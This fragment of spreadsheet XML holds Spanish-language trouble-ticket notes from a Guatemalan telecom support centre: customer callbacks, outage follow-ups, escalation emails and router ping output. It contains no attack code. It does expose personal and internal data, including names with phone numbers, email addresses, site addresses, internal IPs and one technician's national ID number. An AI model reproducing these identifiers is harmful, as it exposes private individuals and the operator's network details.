DURACIÓN: 0:00:23
ESTADO: CONECTADA
DETALLES: 57953241
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 10/06/2022 14:29:57</t>
  </si>
  <si>
    <t>F4597402</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NICOLAS MARCOS 55816403 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001493993</t>
  </si>
  <si>
    <t>F4597415</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE FATIMA HERNANDEZ, QUIEN VA APOYAR A REVISAR LOS EQUIPOS.
2001500468
COLA:
NOMBRE: A: 0050378536710
NÚMERO: 0050378536710
DURACIÓN: 0:00:53
ESTADO: CONECTADA
DETALLES: 0050378536710
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 10/06/2022 15:17:48</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE FATIMA HERNANDEZ 78536710
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4597421</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL ORTIZ 25269051  ##COMENTA QUE REVISARON PBX Y YA TODO OK ##VALIDA CIERRE##VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE MANUEL ORTIZ AL 25269089 INDICA QUE AL MOMENTO DE TRANSFERIR LLAMADA LE SALE UNA GRABACION DE CLARO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 2001817066
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PATRICIA TOMASINO 25269051 MENCIONA QUE YA LE LLAMARON, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001502980</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ## PATRICIA TOMASINO-25269089 CONTSTA SEÑRITA QUE NO QUIERE BRINDAR SU NOMBRE ### CLIENTE INDICA QUE EL SERVICIO SIGUE FALLANDO PERO NO QUIERE BRINDAR MAS DETALLES- SE LE CONSULTO SOBRE HACE CUANTO TIEMMPO FUE EL ULTIMO FALLA + SI EN ESTE MOMENTO LO TIENE ##CLIENTE EVADE PREGUNTAS ### E INDICA QUE AHORITA NO PUEDE REALIZAR PRUEBAS DEBIDO A QUE YA EN 5 MINUTOS ESTA SALIENDO DE TURNO + QUE SE LLAME EL DIA LUNES A LAS 9AM PARA CONFIRMAR SERVICIO ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MANUEL ORTIZ 25269051  - 25269089 SOLICITA QUE SE LE LLAME A LAS 9:00 AM **
-ID 2001797926 - 2001798519
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MASIS 25269096  #NOS CONTESTA SEÑORITA DE RECEPCION E INDICA QUE SE LE MARQUE EN 15 MINUTOS##VIVO</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE CARLOS MASIS 25269096  ## SE HA LLAMADO A CLIENTE 3 VECES ##NO CONTESTA##ENVIA A BUZON##SE INTENTARA LUEGO##VIVO</t>
  </si>
  <si>
    <t xml:space="preserve"> CLIENTE MANUEL ORTIZ 25269051 ##ENVIA A BUZON ##SE HANI NTENTADO 3 VECES##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PATRICIA TOMASINO-25269089 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001980626 - 2001980420</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL ORTIZ 25269051 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001040112</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL ORTIZ 25269051   --  COMENTA QUE ESTA APLICANDO RESET Y VERIFICANDO PBX CON SU PROVEEDOR- COMENTA QUE LUEGO DE ESO REALIZARA PRUEBAS ##PIDE LLAMADA A LAS 3:30PM##
3001332715</t>
  </si>
  <si>
    <t>F4597424</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE VILLEDA 31808554 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA EL DIA MIERCOLES AL MEDIO DIA
-ID 2001820493</t>
  </si>
  <si>
    <t>SERVICIO AUN CAIDO- POSIBLEMENTE PERSISTA PROBLEMA DE ENERGIA EN SITIO-
&lt;FDCEHNP3N1D1EIM1&gt;DIS IP ROUTI VPN HONDURAS_CARGO 10.1.247.250
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : HONDURAS_CARGO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.1.247.248/29  DIRECT  0    0             D   10.1.247.253    VLANIF3312
&lt;FDCEHNP3N1D1EIM1&gt;PING -V
&lt;FDCEHNP3N1D1EIM1&gt;PING -VPN-INSTANCE HONDURAS_CARGO 10.1.247.250
  PING 10.1.247.250: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.1.247.250 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOS</t>
  </si>
  <si>
    <t>F4597427</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE ALEXANDER A QUIEN SE LE SOLICITA REALICE PRUEBAS, SOLICITA SE LE ENVIE CORREO POR TEMAS ADMINISTRATIVOS SOLICITANDO LAS PRUEBAS.
SIN LLAMADAS SALIENTES INTERNACIONALES
ESVIN ANTONIO PAREDES SAMUY
BUEN DÍA ESTIMADO CLIENTE, SE REALIZARON CAMBIOS A NIVEL DE NUESTRA CENTRAL, SOLICITAMOS SU AMABLE APOYO REALIZANDO PRUEBAS. QUEDAMOS ATENTOS A SUS COMENTARIOS.
RESULTADO: LLAMADA HECHA
NOMBRE: 34224345
NÚMERO: 34224345
INICIO: HOY, 09:30
FIN: HOY, 09:31
DURACIÓN: 0:46
ID DE LLAMADA: 3001275832</t>
  </si>
  <si>
    <t>SE LE ENVIO EL SIGUIENTE CORREO AL CLIENTE
HELLO,
WE MADE A REVIEW WITH THE NUMBER 23797200, AND WE DIDN'T FIND ANY RESTRICTIONS TO AN INTERNACIONAL CALLS.
WE NEED TO CONTACT SOMEONE IN GUATEMALA TO MAKE TRACES, WE NEED TO KNOW HOW IS THE PBX SENDING THE  INTERNATIONAL CALLS.
WHEN YOU HAVE THE NAME AND THE NUMBER OF THE PERSON WHO CAN HELP US. LET US KNOW.
REGARDS.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ALEJANDRA TAMPOCO SE TIENE RESPUESTA.
3001306831
COLA:
NOMBRE: A: 34507627
NÚMERO: 34507627
DURACIÓN: 0:00:13
ESTADO: MARCANDO
DETALLES: 34507627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 10:49:55</t>
  </si>
  <si>
    <t>SE CONSIGUE CONTACTO DE EJECUTIVA DE CUENTA SILVIA PERO NO RESPONDE
3001261005
COLA:
NOMBRE: A: 58260474
NÚMERO: 58260474
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58260474
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 08:51:46
3001260963
COLA:
NOMBRE: A: 58260474
NÚMERO: 58260474
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58260474
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 08:52:18
3001261535
COLA:
NOMBRE: A: 58260474
NÚMERO: 58260474
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58260474
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 08:52:22</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE Y SE QUEDA EN ESPERA DE SU RESPUESTA. SE REQUIERE LLEGAR A HACER PRUEBAS CON SOFTPHONE.
RE: SIN LLAMADAS SALIENTES INTERNACIONALES
¿
MICROSOFT OUTLOOK
MAR 14/06/2022 16:16
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: RAULE.ALVAREZ@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
ESVIN ANTONIO PAREDES SAMUY
BUENAS TARDES ESTIMADO CLIENTE, EL PERSONAL ESPECIALISTA DE LADO DE CLARO REALIZO PRUEBAS EL DÍA DE HOY Y EN BASE A ESTAS PRUEBAS REQUERIMOS HACER OTRAS, PERO CON UN EMULADOR EN SU ESTABLECIMIENTO, PARA ESTO TENDRÍAMOS QUE DESCONECTAR LA PBX  Y CONECTAR NUESTRO SOFTPHONE PARA EL E1 23797200, QUE ES EL E1 DONDE SE TIENE EL PROBLEMA. LA SEÑORITA ALEJANDRA NOS INDICÓ QUE ESTAS PRUEBAS SE PUEDEN HACER EN HORARIOS ANTES DE LAS 8 HORAS O DESPUÉS DE LAS 17 HORAS. SOLICITAMOS SU AMABLE APOYO PARA PODER COORDINAR EL INGRESO DEL PERSONAL DE CLARO A SU ESTABLECIMIENTO Y NOS PUEDAN INDICAR EL DÍA Y EN QUE HORARIO PODRÍAMOS LLEGAR A REALIZAR LAS PRUEBAS FALTANTES. ADJUNTO EL LISTADO DE TÉCNICOS Y EL MÁS CERCANO Y DISPONIBLE EL DÍA QUE USTEDES NOS AUTORICEN LLEGARÁ A SU ESTABLECIMIENTO.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HECTOR MISAEL RAMIREZ CARDONA                   DPI 2249238620101
QUEDAMOS A LA ESPERA DE SU RESPUETA.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ALEJANDRA PERO NO RESPONDE.
3001402440
COLA:
NOMBRE: A: 34507627
NÚMERO: 34507627
DURACIÓN: 0:00:07
ESTADO: MARCANDO
DETALLES: 34507627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 15:19:20
3001402600
COLA:
NOMBRE: A: 34507627
NÚMERO: 34507627
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 34507627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 15:19:50</t>
  </si>
  <si>
    <t>PROBLEMA CON LOS DESTINOS NO CON EL ORIGEN DE LA LLAMADA, CLIENTE HACE PRUEBAS HACIA  HN, SV Y NI Y COMPLETAN SIN PROBLEMA. SOLICITA SE LE CONTACTE EN 30 MINUTOS PARA VALIDAR FUNCIONAMIENTO.
3001380020
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 5490
DURACIÓN: 0:14:51
ESTADO: CONECTADA
DETALLES: 5490
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 14:25:30</t>
  </si>
  <si>
    <t>CLIENTE MARIA ALEJANDRA SOLICITA SE LE MARQUE EN 5 MINUTOS
3001143619
COLA:
NOMBRE: A: 34507627
NÚMERO: 34507627
DURACIÓN: 0:00:33
ESTADO: CONECTADA
DETALLES: 34507627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 14:00:01</t>
  </si>
  <si>
    <t>SE ACUERDA CON CLIENTE CLIENTE ALEXANDER QUE LAS PRUEBAS SE REALIZEN A LAS 14 HORAS, YA QUE A ESA HORA REGRESA PERSONAL DE CX  QUE LLEVA EL HISTORIAL DEL CASO.
3001356287
COLA:
NOMBRE: A: 34224345
NÚMERO: 34224345
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 34224345
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 12:58:01</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ALEJANDRA QUIEN CONFIRMA QUE YA TODAS LAS LLAMADAS FUNCIONAN
3001405719
COLA:
NOMBRE: A: 34507627
NÚMERO: 34507627
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 34507627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 15:28:58</t>
  </si>
  <si>
    <t>CLIENTE ALEXANDER INDICA QUE ALEJANDRA ESTA EN HORA DE ALMUERZO. SOLICITA SE LE LLAME A LAS 13:30 HORAS.
3001342487
COLA:
NOMBRE: A: 34224345
NÚMERO: 34224345
DURACIÓN: 0:01:07
ESTADO: CONECTADA
DETALLES: 34224345
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 12:20:21</t>
  </si>
  <si>
    <t>SE LLAMA A LA SEÑORITA  MARIA ALEJANDRA GIRON PEREZ QUIEN INDICA EL CLIENTE QUE ES LA PERSONA QUE NOS APOYARÁ EN LAS PRUEBAS. PERO NO RESPONDE.
3001116304
COLA:
NOMBRE: A: 34507627
NÚMERO: 34507627
DURACIÓN: 0:00:00
ESTADO: MARCANDO
DETALLES: 34507627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 12:34:38
3001116496
COLA:
NOMBRE: A: 34507627
NÚMERO: 34507627
DURACIÓN: 0:00:00
ESTADO: MARCANDO
DETALLES: 34507627
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 12:35:19</t>
  </si>
  <si>
    <t>CLIENTE ALEXANDER NO RESPONDE SE LE CONSULTARÁ MAS TARDE EL RESULTADO DE LAS PRUEBAS
3001296108
COLA:
NOMBRE: A: 34224345
NÚMERO: 34224345
DURACIÓN: 0:00:14
ESTADO: MARCANDO
DETALLES: 34224345
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 10:23:04
3001295447
COLA:
NOMBRE: A: 34224345
NÚMERO: 34224345
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 34224345
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 10:23:25</t>
  </si>
  <si>
    <t>F4597428</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: ID1025053 / KID'S WORLD SOCIEDAD ANONIMA
AXEL SAMUEL LOPEZ ORTIZ
BUENAS TARDES ESTIMADO SR JUAN.
BRINDANDO SEGUIMIENTO AL INCIDENTE REPORTADO, LE COMENTO QUE A NIVEL DE CLARO NO HAY CAÍDAS LAS ÚNICAS CAÍDAS SON LAS DE EL EQUIPO TP-LINK COLOR NEGRO, LE ADJUNTO PRUEBAS DONDE NO HAY NADA ASOCIADO AL ROUTER CISCO QUE CLARO LE BRINDA, EN ESTE CASO TIENE QUE REALIZAR LAS PRUEBAS QUE SE HICIERON EN LA MAÑANA, DESCONECTAR Y VOLVER A CONECTAR EL EQUIPO TP-LINK COLOR NEGRO Y ESPERAR UNOS MINUTOS.
ADICIONAL ADJUNTO LAS PRUEBAS DONDE SE VALIDA QUE ÚNICAMENTE ES SU RED LAN, LA QUE PRESENTA CAÍDAS:
ATENTAMENTE:</t>
  </si>
  <si>
    <t>F4597433</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE JUAN RECINOS 78424477 MENCIONA QUE EL SERVICIO YA RESTABLECIO (CLIENTE MOLESTO)
-ID 2001515267</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE INDICA, QUE TALVEZ SE DEBA A EQUIPO QUE CLARO INSTALO HACE APROXIMANDAMENTE 1 MES, SE LE INDICA QUE NO SE PUEDE ASUMIR DE MOMENTO Y SE DESCARTA QUE SEA POR EL CAMBIO DE EQUIPO DEBIDO A QUE EL INCONVENIENTE SE GENERO HOY Y QUE SE PROCEDERA CON LA REVISION AL MOMENTO DE TENER AVANCES SE LE NOTIFICARA.
NÚMERO: 0050378424477
FIN: HOY, 15:18
ID DE LLAMADA: 2001500072</t>
  </si>
  <si>
    <t>F4597482</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS EDUARDO GODINEZ 42474587 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001154678</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS EDUARDO 42474587 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001517316</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS EDUARDO GODINEZ AL 42474587 CLIENTE SOLICITA QUE SE LE LLAME NUEVAMENTE MAÑANA A LAS 14:00 HRS **
-ID 2001914870
**</t>
  </si>
  <si>
    <t>F4597528</t>
  </si>
  <si>
    <t>SE LLAMA EMANUEL PARA VALIDAR PERO NO RESPONDE---
22153693</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A ANDRES SIN EMBARGO NO RESPONDE-- ENVIA A BUZON--
58650951</t>
  </si>
  <si>
    <t>SE LLAMA A ANDRES PARA VALIDAR SI AUN PERSISTE INCONVENIENTE A NIVEL DE CLARO SERVICIO ACTIVO SIN EMBARGO NO RESPONDE--
58650951</t>
  </si>
  <si>
    <t>F4597530</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 10 DE JUNIO DE 2022 19:14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CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_FUNDGENESIS_GT_INT_EDIF_MINI_Z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7530
ID: 921500007T
IDENTIFICADOR DEL CLIENTE:  CC_FUNDGENESIS_GT_INT_EDIF_MINI_Z4
UBICADO EN:  INTERNET.- 6 AVENIDA 1-27 ZONA 4 EDIF. MINI NIV.1 OF.101
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4597596</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 12 DE JUNIO DE 2022 12:40
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; WILSON LUNA &lt;WILSONLUNA@ICASA.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE ROUTER CLARO POZA VERDE (DC RECICLADOS) (172.30.0.21) ISP: CLARO ID: 86100038 DOWN
BUENAS TARDES ESTIMADOS (A)
COMO PARTE DEL SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO PARA VALIDAR SI AÚN EXISTEN LOS INCONVENIENTES PLANTEADOS. SE VALIDA ENLACE ACTIVO ALCANZABLE A NIVEL DE PING, CON COMUNICACIÓN HACIA CENTRAL. SALUDOS CORDIALES. GRACIAS</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE ES UNA PRUEBA DE ENERGIA, SE LE RESPONDE.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 10 DE JUNIO DE 2022 21:00PARA: WILSON LUNA &lt;WILSONLUNA@ICASA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; ESTUARDO VILLATORO &lt;ESTUARDOV@INGRUP.COM&gt;ASUNTO: RE: ENLACE ALARMADO PARA CLIENTE "CC_CERVECERIA_GT_POZA_VERDE_LA_VEGA"
BUENAS NOCHES,
SI AÚN CONTINÚA CAÍDO EL ENLACE.
PING -VPN-INSTANCE  CERVECERIADATOS 10.18.60.35
  PING 10.18.60.35: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.18.60.35 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;OBARGTBAN1T1D04A03EIM3&gt;
SALUDOS.
DE: WILSON LUNA &lt;WILSONLUNA@ICASA.COM.GT&gt;ENVIADO: VIERNES, 10 DE JUNIO DE 2022 20:56PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; ESTUARDO VILLATORO &lt;ESTUARDOV@INGRUP.COM&gt;ASUNTO: RE: ENLACE ALARMADO PARA CLIENTE "CC_CERVECERIA_GT_POZA_VERDE_LA_VEGA"
BUENAS NOCHES,
SE TIENE UNA PRUEBA DE ENERGÍA, POR FAVOR VERIFICAR SI AUN CONTINUA ALARMADO EL EQUIPO POR FAVOR.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LE RESPONDE A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 10 DE JUNIO DE 2022 21:00PARA: WILSON LUNA &lt;WILSONLUNA@ICASA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; ESTUARDO VILLATORO &lt;ESTUARDOV@INGRUP.COM&gt;ASUNTO: RE: ENLACE ALARMADO PARA CLIENTE "CC_CERVECERIA_GT_POZA_VERDE_LA_VEGA"
BUENAS NOCHES,
SI AÚN CONTINÚA CAÍDO EL ENLACE.
PING -VPN-INSTANCE  CERVECERIADATOS 10.18.60.35
  PING 10.18.60.35: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.18.60.35 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;OBARGTBAN1T1D04A03EIM3&gt;
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 10 DE JUNIO DE 2022 20:52PARA: TELECOMVPC@ICASA.COM.GT &lt;TELECOMVPC@ICASA.COM.GT&gt;; USCTELECOM@ICASA.COM.GT &lt;USCTELECOM@ICASA.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_CERVECERIA_GT_POZA_VERDE_LA_VEG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7596
ID: 86100087T
IDENTIFICADOR DEL CLIENTE:  CC_CERVECERIA_GT_POZA_VERDE_LA_VEGA
UBICADO EN:  KM. 41 CARRETERA A EL SALVADOR BARBERENA SANTA ROSA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL SOLICITANDO CONTACTO ADICIONAL --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 03:12
PARA: WILSON LUNA &lt;WILSONLUNA@ICASA.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE ROUTER CLARO POZA VERDE (DC RECICLADOS) (172.30.0.21) ISP: CLARO ID: 86100038 DOWN
ESTIMADO SR. LUNA.
                CONTINUANDO CON EL SEGUIMIENTO AL CASO, ES NECESARIO REALIZAR PRUEBAS CON EQUIPOS EN SITIO SIN EMBARGO EL NÚMERO DE CONTACTO COMPARTIDO ENVÍA DIRECTO A BUZÓN.
PODRÍA APOYARNOS EN INDICAR UN NUMERO ADICIONAL PARA PODER CONTINUAR CON LAS PRUEBAS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4597602</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 18:55
PARA: MESA DE AYUDA HONDURAS &lt;MESADEAYUDAHN@ITSINFOCOM.COM&gt;; ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CALL CENTER VIP &lt;CALLCENTER.VIP@CLARO.COM.HN&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: 'TELECOMHN' &lt;TELECOMHN@BANRURAL.COM.HN&gt;; SERVICE DESK HN &lt;SERVICEDESKHN@ITSINFOCOM.COM&gt;
ASUNTO: RE: CAIDA BANRURAL | COP_COPAN RUINAS_CLARO | 10/06/2022 | ID01061
BUENAS TARDES ESTIMADOS (A):
COMO PARTE DEL SEGUIMIENTO AL CASO CAIDA BANRURAL | COP_COPAN RUINAS_CLARO | 10/06/2022 | ID01061, EN ESTOS MOMENTOS SE OBSERVA EL LINK DESDE LA INTERFAZ DEL EQUIPO DE ACCESO HACIA INSTALACIONES DOWN. POR LO QUE SE HACE NECESARIO REALIZAR LAS PRUEBAS DE PRIMER NIVEL EN SITIO O BIEN INDICAR SI YA FUERON REALIZADAS. DE ANTEMANO GRACIAS. SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4597603</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE WILLIAM  NO RESONDE.
3001096008
COLA:
NOMBRE: A: 58595226
NÚMERO: 58595226
DURACIÓN: 0:00:27
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58595226
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 11:40:39
3001096446
COLA:
NOMBRE: A: 58595226
NÚMERO: 58595226
DURACIÓN: 0:00:16
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58595226
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 11:40:50</t>
  </si>
  <si>
    <t>--- SE UBICA EL NUMERO 22864100 EXT. 9053. ...</t>
  </si>
  <si>
    <t>--- NO SE LOGRA COMUNICACION CON WILLIAM MONTERROSO 58595226 (CLIENTE), SE INTENTARA EN UN MOMENTO. ...
RESULTADO: LLAMADA HECHA
NOMBRE: 58595226
NÚMERO: 58595226
INICIO: HOY, 10:40
FIN: HOY, 10:40
DURACIÓN: 0:41
ID DE LLAMADA: 2001597679
RESULTADO: LLAMADA HECHA
NOMBRE: 58595226
NÚMERO: 58595226
INICIO: HOY, 10:41
FIN: HOY, 10:41
DURACIÓN: 0:37
ID DE LLAMADA: 2001597873
...</t>
  </si>
  <si>
